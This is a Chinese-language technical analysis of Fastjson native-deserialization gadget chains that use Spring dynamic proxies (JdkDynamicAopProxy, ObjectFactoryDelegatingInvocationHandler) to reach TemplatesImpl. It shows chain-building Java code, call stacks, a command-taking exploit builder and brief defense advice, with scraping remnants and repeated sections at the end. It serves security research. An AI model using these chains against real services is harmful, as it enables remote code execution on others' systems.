Fastjson原生反序列化配合动态代理绕过限制技术分析<\/h1>

前言<\/h2>
本文详细分析Fastjson原生反序列化漏洞中利用动态代理技术绕过限制的方法，重点介绍两种动态代理实现方式：JdkDynamicAopProxy和ObjectFactoryDelegatingInvocationHandler。<\/p>

动态代理基础<\/h2>

动态代理在CC1链中的应用<\/h3>

在Commons Collections 1(CC1)链中，动态代理是关键环节：<\/p>

\/\/ CC1链动态代理部分代码
<\/span><\/span><\/span><\/span>Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvocationHandler instance =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> decorate);<\/span>
<\/span><\/span>Map proxyInstance =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> instance);<\/span>
<\/span><\/span><\/code><\/pre>调用链分析：<\/p>
AnnotationInvocationHan.readobject
  → proxy.entryset
    → AnnotationInvocationHan.invoke
      → LazyMap.get
        → chainedTransformer.transformer...
<\/code><\/pre>
AnnotationInvocationHandler的invoke方法<\/h3>
关键方法分析：<\/p>
public<\/span> Object invoke<\/span>(<\/span>Object var1,<\/span> Method var2,<\/span> Object[]<\/span> var3)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    default<\/span>:<\/span>
<\/span><\/span>        Object var6 =<\/span> this<\/span>.<\/span>memberValues<\/span>.<\/span>get<\/span>(<\/span>var4);<\/span>  \/\/ 关键点：memberValues可控
<\/span><\/span><\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JdkDynamicAopProxy代理绕过<\/h2>
基本原理<\/h3>

构造JdkDynamicAopProxy<\/code>对象，将TemplatesImpl<\/code>设置为targetSource<\/code><\/li>
使用该对象构造代理类，代理javax.xml.transform.Templates<\/code>接口<\/li>
JSON序列化库只能从代理对象上找到getOutputProperties<\/code>方法<\/li>
通过代理机制触发TemplatesImpl#getOutputProperties<\/code><\/li>
<\/ol>
关键代码实现<\/h3>
public<\/span> class<\/span> JdkDynamicAopProxyNode<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> Object makeGadget<\/span>(<\/span>Object gadget)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        AdvisedSupport as =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>        as.<\/span>setTargetSource<\/span>(<\/span>new<\/span> SingletonTargetSource(<\/span>gadget));<\/span>
<\/span><\/span>        return<\/span> Reflections.<\/span>newInstance<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>,<\/span> AdvisedSupport.<\/span>class<\/span>,<\/span> as);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>调用栈分析<\/h3>
invoke:160, JdkDynamicAopProxy
getOutputProperties:-1, $Proxy1
write:-1, OWG_1_1_$Proxy1
write:3124, JSONWriterUTF16
toString:914, JSONArray
readObject:86, BadAttributeValueExpException
...
<\/code><\/pre>
ObjectFactoryDelegatingInvocationHandler绕过<\/h2>
实现原理<\/h3>

代理Templates接口<\/li>
使用JSONObject代理ObjectFactoryDelegatingInvocationHandler中的objectFactory属性<\/li>
返回TemplatesImpl对象<\/li>
<\/ol>
关键方法分析<\/h3>
public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    switch<\/span> (<\/span>method.<\/span>getName<\/span>())<\/span> {<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>        default<\/span>:<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                return<\/span> method.<\/span>invoke<\/span>(<\/span>this<\/span>.<\/span>objectFactory<\/span>.<\/span>getObject<\/span>(),<\/span> args);<\/span>  \/\/ 关键调用
<\/span><\/span><\/span><\/span>            }<\/span> catch<\/span> (<\/span>InvocationTargetException var6)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> var6.<\/span>getTargetException<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>调用栈分析<\/h3>
invoke:292, AutowireUtils$ObjectFactoryDelegatingInvocationHandler
getOutputProperties:-1, $Proxy2
write:-1, OWG_1_1_$Proxy2
write:3124, JSONWriterUTF16
toString:914, JSONArray
readObject:86, BadAttributeValueExpException
...
<\/code><\/pre>
完整利用链构造<\/h2>
public<\/span> class<\/span> Fastjson4_JdkDynamicAopProxy<\/span> {<\/span>
<\/span><\/span>    public<\/span> Object getObject<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Object node1 =<\/span> TemplatesImplNode.<\/span>makeGadget<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        Object node2 =<\/span> JdkDynamicAopProxyNode.<\/span>makeGadget<\/span>(<\/span>node1);<\/span>
<\/span><\/span>        Proxy proxy =<\/span> (<\/span>Proxy)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>Proxy.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> (<\/span>InvocationHandler)<\/span>node2);<\/span>
<\/span><\/span>        Object node3 =<\/span> JsonArrayNode.<\/span>makeGadget<\/span>(<\/span>2<\/span>,<\/span> proxy);<\/span>
<\/span><\/span>        Object node4 =<\/span> BadAttrValExeNode.<\/span>makeGadget<\/span>(<\/span>node3);<\/span>
<\/span><\/span>        Object[]<\/span> array =<\/span> new<\/span> Object[]{<\/span>node1,<\/span> node4};<\/span>
<\/span><\/span>        Object node5 =<\/span> HashMapNode.<\/span>makeGadget<\/span>(<\/span>array);<\/span>
<\/span><\/span>        return<\/span> node5;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>技术要点总结<\/h2>

动态代理选择<\/strong>：根据目标环境选择合适的动态代理实现<\/li>
接口代理<\/strong>：必须代理Templates接口以确保getOutputProperties方法可用<\/li>
目标对象注入<\/strong>：通过TargetSource或ObjectFactory机制注入恶意TemplatesImpl对象<\/li>
调用链构造<\/strong>：合理组合JSONArray、BadAttributeValueExpException等组件形成完整利用链<\/li>
版本适配<\/strong>：注意不同Fastjson版本和JDK版本间的兼容性问题<\/li>
<\/ol>
防御建议<\/h2>

升级Fastjson到最新安全版本<\/li>
限制反序列化时的类加载行为<\/li>
对动态代理对象进行严格校验<\/li>
实施最小权限原则，限制危险类的使用<\/li>
<\/ol>

Fastjson原生反序列化配合动态代理绕过限制技术分析<\/h1>

前言<\/h2> 本文详细分析Fastjson原生反序列化漏洞中利用动态代理技术绕过限制的方法，重点介绍两种动态代理实现方式：JdkDynamicAopProxy和ObjectFactoryDelegatingInvocationHandler。<\/p>

动态代理基础<\/h2>

JdkDynamicAopProxy代理绕过<\/h2>

ObjectFactoryDelegatingInvocationHandler绕过<\/h2>

防御建议<\/h2> 升级Fastjson到最新安全版本<\/li> 限制反序列化时的类加载行为<\/li> 对动态代理对象进行严格校验<\/li> 实施最小权限原则，限制危险类的使用<\/li> <\/ol>

前言<\/h2>
本文详细分析Fastjson原生反序列化漏洞中利用动态代理技术绕过限制的方法，重点介绍两种动态代理实现方式：JdkDynamicAopProxy和ObjectFactoryDelegatingInvocationHandler。<\/p>

防御建议<\/h2>

升级Fastjson到最新安全版本<\/li>
限制反序列化时的类加载行为<\/li>
对动态代理对象进行严格校验<\/li>
实施最小权限原则，限制危险类的使用<\/li> <\/ol>